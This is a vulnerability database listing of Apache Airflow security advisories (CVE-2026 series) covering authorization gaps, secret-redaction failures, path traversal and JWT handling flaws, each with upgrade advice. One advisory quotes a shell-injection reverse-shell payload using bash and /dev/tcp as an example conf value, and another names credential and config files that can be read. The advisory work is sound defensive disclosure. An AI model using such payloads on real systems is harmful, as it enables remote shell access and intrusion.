| 0 |
| url |
VCID-1w96-f72k-ryap |
| vulnerability_id |
VCID-1w96-f72k-ryap |
| summary |
A Dag author could either (a) create a symlink under their task's log directory pointing to an arbitrary file readable by the API server process (read-path attack — e.g. `/etc/passwd` or `airflow.cfg`) or (b) supply a `task_id` containing `..` sequences accepted by the Task SDK's `KEY_REGEX` (write-path attack), and in both cases the FileTaskHandler resolves the log path outside the configured `base_log_folder`, leaking or overwriting arbitrary files. Only affects deployments where the worker log folder is shared with the API server. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. As a defense-in-depth mitigation, deploy the worker and API server with separate log volumes so that worker-controlled paths cannot reach the API server's filesystem. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2026-40861, PYSEC-2026-181
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-1w96-f72k-ryap |
|
| 1 |
| url |
VCID-2b14-1bp2-gua6 |
| vulnerability_id |
VCID-2b14-1bp2-gua6 |
| summary |
Apache Airflow versions 3.0.0 through 3.1.7 FastAPI DagVersion listing API does not apply per-DAG authorization filtering when the request is made with dag_id set to "~" (wildcard for all DAGs). As a result, version metadata of DAGs that the requester is not authorized to access is returned.
Users are recommended to upgrade to Apache Airflow 3.1.8 or later, which resolves this issue. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/apache-airflow@3.1.8 |
| purl |
pkg:pypi/apache-airflow@3.1.8 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1w96-f72k-ryap |
|
| 1 |
| vulnerability |
VCID-2xr2-w3hk-auck |
|
| 2 |
| vulnerability |
VCID-5jyk-dgtu-zfhd |
|
| 3 |
| vulnerability |
VCID-91n6-evww-zybp |
|
| 4 |
| vulnerability |
VCID-9ru4-qyks-hybs |
|
| 5 |
| vulnerability |
VCID-dhj9-usjr-nbfe |
|
| 6 |
| vulnerability |
VCID-djdy-z9r3-s3a2 |
|
| 7 |
| vulnerability |
VCID-dzfs-e5ys-fbhz |
|
| 8 |
| vulnerability |
VCID-ej1r-mp6n-gudd |
|
| 9 |
| vulnerability |
VCID-etmw-7eq5-mqa2 |
|
| 10 |
| vulnerability |
VCID-geg4-1kgh-akde |
|
| 11 |
| vulnerability |
VCID-pu6f-xhvm-q3du |
|
| 12 |
| vulnerability |
VCID-w56f-fmkf-dkfv |
|
| 13 |
| vulnerability |
VCID-xd5g-jkrd-67cr |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.1.8 |
|
|
| aliases |
CVE-2026-26929, GHSA-4m3h-wp5w-5hqh, PYSEC-2026-14
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-2b14-1bp2-gua6 |
|
| 2 |
| url |
VCID-2xr2-w3hk-auck |
| vulnerability_id |
VCID-2xr2-w3hk-auck |
| summary |
Dag Authors, who normally should not be able to execute code in the webserver context could craft XCom payload causing the webserver to execute arbitrary code. Since Dag Authors are already highly trusted, severity of this issue is Low.
Users are recommended to upgrade to Apache Airflow 3.2.0, which fixes the issue. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2026-25917, GHSA-6ffj-2wg2-w45j, PYSEC-2026-13
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-2xr2-w3hk-auck |
|
| 3 |
| url |
VCID-5hxx-r2d2-9ybk |
| vulnerability_id |
VCID-5hxx-r2d2-9ybk |
| summary |
Apache Airflow versions 3.1.0 through 3.1.6 contain an authorization flaw that can allow an authenticated user with custom permissions limited to task access to view task logs without having task log access.
Users are recommended to upgrade to Apache Airflow 3.1.7 or later, which resolves this issue. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/apache-airflow@3.1.7 |
| purl |
pkg:pypi/apache-airflow@3.1.7 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1w96-f72k-ryap |
|
| 1 |
| vulnerability |
VCID-2b14-1bp2-gua6 |
|
| 2 |
| vulnerability |
VCID-2xr2-w3hk-auck |
|
| 3 |
| vulnerability |
VCID-5jyk-dgtu-zfhd |
|
| 4 |
| vulnerability |
VCID-91n6-evww-zybp |
|
| 5 |
| vulnerability |
VCID-9j1n-cypf-p7g5 |
|
| 6 |
| vulnerability |
VCID-9ru4-qyks-hybs |
|
| 7 |
| vulnerability |
VCID-dhj9-usjr-nbfe |
|
| 8 |
| vulnerability |
VCID-djdy-z9r3-s3a2 |
|
| 9 |
| vulnerability |
VCID-dzfs-e5ys-fbhz |
|
| 10 |
| vulnerability |
VCID-ej1r-mp6n-gudd |
|
| 11 |
| vulnerability |
VCID-etmw-7eq5-mqa2 |
|
| 12 |
| vulnerability |
VCID-geg4-1kgh-akde |
|
| 13 |
| vulnerability |
VCID-hkwf-65vr-dkfz |
|
| 14 |
| vulnerability |
VCID-knrd-atwy-gubn |
|
| 15 |
| vulnerability |
VCID-pu6f-xhvm-q3du |
|
| 16 |
| vulnerability |
VCID-w56f-fmkf-dkfv |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.1.7 |
|
|
| aliases |
CVE-2026-22922, GHSA-pm44-x5x7-24c4, PYSEC-2026-11
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-5hxx-r2d2-9ybk |
|
| 4 |
| url |
VCID-5jyk-dgtu-zfhd |
| vulnerability_id |
VCID-5jyk-dgtu-zfhd |
| summary |
Apache Airflow's scheduler-side deadline-reference decoder (`SerializedCustomReference.deserialize_reference`) imported and dispatched arbitrary class paths drawn from DAG-author-controlled serialized state without an allowlist or plugin-registry gate. A DAG author whose code reaches the scheduler — the default on single-host deployments where the DAG bundle is importable from the scheduler process — could embed a custom `DeadlineReference` whose serialized form named an attacker-controlled module path, causing the scheduler to `import_string(...)` and instantiate that class with a live SQLAlchemy session attached. Affects deployments where DAG-author code is less trusted than the scheduler process. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2026-45360, PYSEC-2026-186
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-5jyk-dgtu-zfhd |
|
| 5 |
| url |
VCID-91n6-evww-zybp |
| vulnerability_id |
VCID-91n6-evww-zybp |
| summary |
In case of SQL errors, exception/stack trace of errors was exposed in API even if "api/expose_stack_traces" was set to false. That could lead to exposing additional information to potential attacker. Users are recommended to upgrade to Apache Airflow 3.2.0, which fixes the issue. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2026-30912, GHSA-w7cf-2pmc-5m4c, PYSEC-2026-18
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-91n6-evww-zybp |
|
| 6 |
| url |
VCID-9j1n-cypf-p7g5 |
| vulnerability_id |
VCID-9j1n-cypf-p7g5 |
| summary |
Apache Airflow versions 3.1.0 through 3.1.7 /ui/dependencies endpoint returns the full DAG dependency graph without filtering by authorized DAG IDs. This allows an authenticated user with only DAG Dependencies permission to enumerate DAGs they are not authorized to view.
Users are recommended to upgrade to Apache Airflow 3.1.8 or later, which resolves this issue. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/apache-airflow@3.1.8 |
| purl |
pkg:pypi/apache-airflow@3.1.8 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1w96-f72k-ryap |
|
| 1 |
| vulnerability |
VCID-2xr2-w3hk-auck |
|
| 2 |
| vulnerability |
VCID-5jyk-dgtu-zfhd |
|
| 3 |
| vulnerability |
VCID-91n6-evww-zybp |
|
| 4 |
| vulnerability |
VCID-9ru4-qyks-hybs |
|
| 5 |
| vulnerability |
VCID-dhj9-usjr-nbfe |
|
| 6 |
| vulnerability |
VCID-djdy-z9r3-s3a2 |
|
| 7 |
| vulnerability |
VCID-dzfs-e5ys-fbhz |
|
| 8 |
| vulnerability |
VCID-ej1r-mp6n-gudd |
|
| 9 |
| vulnerability |
VCID-etmw-7eq5-mqa2 |
|
| 10 |
| vulnerability |
VCID-geg4-1kgh-akde |
|
| 11 |
| vulnerability |
VCID-pu6f-xhvm-q3du |
|
| 12 |
| vulnerability |
VCID-w56f-fmkf-dkfv |
|
| 13 |
| vulnerability |
VCID-xd5g-jkrd-67cr |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.1.8 |
|
|
| aliases |
CVE-2026-28563, GHSA-x3fv-96qh-67m7, PYSEC-2026-15
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-9j1n-cypf-p7g5 |
|
| 7 |
| url |
VCID-9ru4-qyks-hybs |
| vulnerability_id |
VCID-9ru4-qyks-hybs |
| summary |
Apache Airflow's official documentation at `core-concepts/dag-run.html` ("Passing Parameters when triggering Dags") showed a verbatim `BashOperator(bash_command="echo value: {{ dag_run.conf['conf1'] }}")` example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into deployments where users had `Dag.can_trigger` permission on the affected Dag (typical multi-team deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection via the `conf` field of the trigger API: an authenticated trigger user could supply `"; bash -i >& /dev/tcp/.../9999 0>&1; #"` as a `conf` value and reach an `os.exec` on the worker. This CVE covers the documentation correction in `apache/airflow` PR 64129 — the pattern in the docs example now includes explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. Users are advised to upgrade to `apache-airflow` 3.2.2 or later to pick up the corrected documentation shipped with the release. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2026-42252, PYSEC-2026-184
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-9ru4-qyks-hybs |
|
| 8 |
| url |
VCID-dhj9-usjr-nbfe |
| vulnerability_id |
VCID-dhj9-usjr-nbfe |
| summary |
Apache Airflow's `JWTRefreshMiddleware` set the JWT auth cookie without the `Secure` flag, so deployments running the Airflow API server behind an HTTPS-terminating reverse proxy (e.g. nginx / Envoy / a managed load balancer that terminates TLS and forwards plaintext to the API server, the default cloud-native topology) would have the user's session JWT replayed over any cleartext HTTP request to the same host. A network-positioned attacker (Wi-Fi MITM, hostile LAN, captive-portal proxy) could induce a logged-in user's browser to issue an HTTP request to the deployment's hostname and capture the JWT cookie out of that request, then replay it against the authenticated API. Affects deployments where the Airflow API server is reached through a TLS-terminating proxy and the cookie's secure-by-default protection is load-bearing for session integrity. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2026-41017, PYSEC-2026-171
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-dhj9-usjr-nbfe |
|
| 9 |
| url |
VCID-djdy-z9r3-s3a2 |
| vulnerability_id |
VCID-djdy-z9r3-s3a2 |
| summary |
A bug in Apache Airflow's auth manager logout handling left previously-issued JWT tokens valid after the user clicked logout in the UI: the logout flow for `FabAuthManager` and `KeycloakAuthManager` did not actually reach the underlying `revoke_token()` call, so the JWT remained accepted by the API server until its natural expiry. An attacker holding a previously-issued JWT for a logged-out user could continue to make authenticated API calls as that user. Affects deployments configured with `FabAuthManager` or `KeycloakAuthManager` (the bug does not affect SimpleAuthManager). This is a residual gap in the fix for CVE-2025-57735, which addressed cookie-side invalidation in PR #57992 / PR #61339 but did not cover the provider-side `revoke_token()` reachability in the FAB / Keycloak code paths. Users who already upgraded for CVE-2025-57735 should additionally upgrade to `apache-airflow` 3.2.2 or later to cover the FAB / Keycloak logout paths. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2026-48726, PYSEC-2026-187
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-djdy-z9r3-s3a2 |
|
| 10 |
| url |
VCID-dzfs-e5ys-fbhz |
| vulnerability_id |
VCID-dzfs-e5ys-fbhz |
| summary |
Exploitation requires the attacker to already be an authenticated Airflow worker holding a valid Log-server JWT issued for at least one Dag. Apache Airflow's Log server authorized JWT tokens against Dag IDs by applying Python's `str.lstrip()` to the requested path segment when verifying the JWT's `sub` claim. `str.lstrip()` strips any of a *set* of characters from the left (not a prefix), so a JWT issued for a Dag named e.g. `dag_a` would authorize log access to any other Dag whose name began with any subset of the characters `{d, a, g, _}` (e.g. `dag_attacker`, `aaaa_target`, `_dag_secret`). Such an authenticated worker could enumerate and read worker logs of other Dags whose names happened to share that character-class prefix, leaking task output and error traces beyond the documented per-Dag isolation boundary. Affects deployments relying on per-Dag log-access scoping (multi-team, shared-executor, shared-worker topologies). Users are advised to upgrade to `apache-airflow` 3.2.2 or later. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2026-45426, PYSEC-2026-174
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-dzfs-e5ys-fbhz |
|
| 11 |
| url |
VCID-ej1r-mp6n-gudd |
| vulnerability_id |
VCID-ej1r-mp6n-gudd |
| summary |
A bug in the GET `/api/v2/connections/{connection_id}` REST API endpoint in Apache Airflow allowed an authenticated UI/API user with Connection-read permission to retrieve secrets stored in a Connection's `extra` JSON blob under field names not present in the redaction allowlist (`DEFAULT_SENSITIVE_FIELDS`) — for example, official Slack-provider credential field names were returned in plaintext. Affects deployments that store credentials in Connection `extra` blobs and grant Connection-read access to multiple users. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. As a defense-in-depth mitigation, deployment operators can store sensitive credential values in a secret-backend rather than inlined into the Connection's `extra` field. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2026-45192, PYSEC-2026-173
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-ej1r-mp6n-gudd |
|
| 12 |
| url |
VCID-etmw-7eq5-mqa2 |
| vulnerability_id |
VCID-etmw-7eq5-mqa2 |
| summary |
Apache Airflow versions 3.0.0 through 3.1.8 DagRun wait endpoint returns XCom result values even to users who only have DAG Run read permissions, such as the Viewer role.This behavior conflicts with the FAB RBAC model, which treats XCom as a separate protected resource, and with the security model documentation that defines the Viewer role as read-only.
Airflow uses the FAB Auth Manager to manage access control on a per-resource basis. The Viewer role is intended to be read-only by default, and the security model documentation defines Viewer users as those who can inspect DAGs without accessing sensitive execution results.
Users are recommended to upgrade to Apache Airflow 3.2.0 which resolves this issue. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2026-34538, GHSA-r7vr-m4jw-r794, PYSEC-2026-21
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-etmw-7eq5-mqa2 |
|
| 13 |
| url |
VCID-geg4-1kgh-akde |
| vulnerability_id |
VCID-geg4-1kgh-akde |
| summary |
Secrets in Variables saved as JSON dictionaries were not properly redacted - in case thee variables were retrieved by the user the secrets stored as nested fields were not masked.
If you do not store variables with sensitive values in JSON form, you are not affected. Otherwise please upgrade to Apache Airflow 3.2.0 that has the fix implemented |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2026-32690, GHSA-w9r4-94fj-xp69, PYSEC-2026-19
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-geg4-1kgh-akde |
|
| 14 |
| url |
VCID-hkwf-65vr-dkfz |
| vulnerability_id |
VCID-hkwf-65vr-dkfz |
| summary |
Apache Airflow versions 3.1.0 through 3.1.7 missing authorization vulnerability in the Execution API's Human-in-the-Loop (HITL) endpoints that allows any authenticated task instance to read, approve, or reject HITL workflows belonging to any other task instance.
Users are recommended to upgrade to Apache Airflow 3.1.8 or later, which resolves this issue. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/apache-airflow@3.1.8 |
| purl |
pkg:pypi/apache-airflow@3.1.8 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1w96-f72k-ryap |
|
| 1 |
| vulnerability |
VCID-2xr2-w3hk-auck |
|
| 2 |
| vulnerability |
VCID-5jyk-dgtu-zfhd |
|
| 3 |
| vulnerability |
VCID-91n6-evww-zybp |
|
| 4 |
| vulnerability |
VCID-9ru4-qyks-hybs |
|
| 5 |
| vulnerability |
VCID-dhj9-usjr-nbfe |
|
| 6 |
| vulnerability |
VCID-djdy-z9r3-s3a2 |
|
| 7 |
| vulnerability |
VCID-dzfs-e5ys-fbhz |
|
| 8 |
| vulnerability |
VCID-ej1r-mp6n-gudd |
|
| 9 |
| vulnerability |
VCID-etmw-7eq5-mqa2 |
|
| 10 |
| vulnerability |
VCID-geg4-1kgh-akde |
|
| 11 |
| vulnerability |
VCID-pu6f-xhvm-q3du |
|
| 12 |
| vulnerability |
VCID-w56f-fmkf-dkfv |
|
| 13 |
| vulnerability |
VCID-xd5g-jkrd-67cr |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.1.8 |
|
|
| aliases |
CVE-2026-30911, GHSA-8x34-9q3v-h7g8, PYSEC-2026-17
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-hkwf-65vr-dkfz |
|
| 15 |
| url |
VCID-knrd-atwy-gubn |
| vulnerability_id |
VCID-knrd-atwy-gubn |
| summary |
Apache Airflow versions 3.1.0 through 3.1.7 session token (_token) in cookies is set to path=/ regardless of the configured [webserver] base_url or [api] base_url.
This allows any application co-hosted under the same domain to capture valid Airflow session tokens from HTTP request headers, allowing full session takeover without attacking Airflow itself.
Users are recommended to upgrade to Apache Airflow 3.1.8 or later, which resolves this issue. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/apache-airflow@3.1.8 |
| purl |
pkg:pypi/apache-airflow@3.1.8 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1w96-f72k-ryap |
|
| 1 |
| vulnerability |
VCID-2xr2-w3hk-auck |
|
| 2 |
| vulnerability |
VCID-5jyk-dgtu-zfhd |
|
| 3 |
| vulnerability |
VCID-91n6-evww-zybp |
|
| 4 |
| vulnerability |
VCID-9ru4-qyks-hybs |
|
| 5 |
| vulnerability |
VCID-dhj9-usjr-nbfe |
|
| 6 |
| vulnerability |
VCID-djdy-z9r3-s3a2 |
|
| 7 |
| vulnerability |
VCID-dzfs-e5ys-fbhz |
|
| 8 |
| vulnerability |
VCID-ej1r-mp6n-gudd |
|
| 9 |
| vulnerability |
VCID-etmw-7eq5-mqa2 |
|
| 10 |
| vulnerability |
VCID-geg4-1kgh-akde |
|
| 11 |
| vulnerability |
VCID-pu6f-xhvm-q3du |
|
| 12 |
| vulnerability |
VCID-w56f-fmkf-dkfv |
|
| 13 |
| vulnerability |
VCID-xd5g-jkrd-67cr |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.1.8 |
|
|
| aliases |
CVE-2026-28779, GHSA-4fhm-p86v-hwpx, PYSEC-2026-16
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-knrd-atwy-gubn |
|
| 16 |
| url |
VCID-pu6f-xhvm-q3du |
| vulnerability_id |
VCID-pu6f-xhvm-q3du |
| summary |
A bug in Apache Airflow's rendered-template field handling caused nested sensitive-key masking (e.g. nested `password` / `token` / `secret` / `api_key` keys inside a JSON template structure) to be bypassed when the rendered field exceeded `[core] max_templated_field_length`: Airflow stringified the structure before redaction, losing the nested key context, and persisted the plaintext value into `rendered_fields`. An authenticated UI/API user with permission to read rendered template fields could harvest secret values intended to be masked. Affects deployments where Dag authors pass structured JSON to operators with nested sensitive keys. This is a variant of `CWE-200` previously addressed for the user-registered `mask_secret()` patterns in CVE-2025-68438; that fix did not cover the nested sensitive-keyword allowlist. Users who already upgraded for CVE-2025-68438 should additionally upgrade to `apache-airflow` 3.2.2 or later to cover the nested-key path. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2026-42360, PYSEC-2026-172
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-pu6f-xhvm-q3du |
|
| 17 |
| url |
VCID-tbb9-myv7-a7h4 |
| vulnerability_id |
VCID-tbb9-myv7-a7h4 |
| summary |
Apache Airflow versions 3.0.0 - 3.1.7, has vulnerability that allows authenticated UI users with permission to one or more specific Dags to view import errors generated by other Dags they did not have access to.
Users are advised to upgrade to 3.1.7 or later, which resolves this issue |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/apache-airflow@3.1.7 |
| purl |
pkg:pypi/apache-airflow@3.1.7 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1w96-f72k-ryap |
|
| 1 |
| vulnerability |
VCID-2b14-1bp2-gua6 |
|
| 2 |
| vulnerability |
VCID-2xr2-w3hk-auck |
|
| 3 |
| vulnerability |
VCID-5jyk-dgtu-zfhd |
|
| 4 |
| vulnerability |
VCID-91n6-evww-zybp |
|
| 5 |
| vulnerability |
VCID-9j1n-cypf-p7g5 |
|
| 6 |
| vulnerability |
VCID-9ru4-qyks-hybs |
|
| 7 |
| vulnerability |
VCID-dhj9-usjr-nbfe |
|
| 8 |
| vulnerability |
VCID-djdy-z9r3-s3a2 |
|
| 9 |
| vulnerability |
VCID-dzfs-e5ys-fbhz |
|
| 10 |
| vulnerability |
VCID-ej1r-mp6n-gudd |
|
| 11 |
| vulnerability |
VCID-etmw-7eq5-mqa2 |
|
| 12 |
| vulnerability |
VCID-geg4-1kgh-akde |
|
| 13 |
| vulnerability |
VCID-hkwf-65vr-dkfz |
|
| 14 |
| vulnerability |
VCID-knrd-atwy-gubn |
|
| 15 |
| vulnerability |
VCID-pu6f-xhvm-q3du |
|
| 16 |
| vulnerability |
VCID-w56f-fmkf-dkfv |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.1.7 |
|
|
| aliases |
CVE-2026-24098, GHSA-5g2w-9f8g-g5q7, PYSEC-2026-12
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-tbb9-myv7-a7h4 |
|
| 18 |
| url |
VCID-w56f-fmkf-dkfv |
| vulnerability_id |
VCID-w56f-fmkf-dkfv |
| summary |
Before Airflow 3.2.0, it was unclear that secure Airflow deployments require the Deployment Manager to take appropriate actions and pay attention to security details and security model of Airflow. Some assumptions the Deployment Manager could make were not clear or explicit enough, even though Airflow's intentions and security model of Airflow did not suggest different assumptions. The overall security model [1], workload isolation [2], and JWT authentication details [3] are now described in more detail. Users concerned with role isolation and following the Airflow security model of Airflow are advised to upgrade to Airflow 3.2, where several security improvements have been implemented. They should also read and follow the relevant documents to make sure that their deployment is secure enough. It also clarifies that the Deployment Manager is ultimately responsible for securing your Airflow deployment. This had also been communicated via Airflow 3.2.0 Blog announcement [4].
[1] Security Model: https://airflow.apache.org/docs/apache-airflow/stable/security/jwt_token_authentication.html
[2] Workload isolation: https://airflow.apache.org/docs/apache-airflow/stable/security/workload.html
[3] JWT Token authentication: https://airflow.apache.org/docs/apache-airflow/stable/security/jwt_token_authentication.html
[4] Airflow 3.2.0 Blog announcement: https://airflow.apache.org/blog/airflow-3.2.0/
Users are recommended to upgrade to version 3.2.0, which fixes this issue. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2025-66236, GHSA-j86x-fwp2-qh7v, PYSEC-2026-8
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-w56f-fmkf-dkfv |
|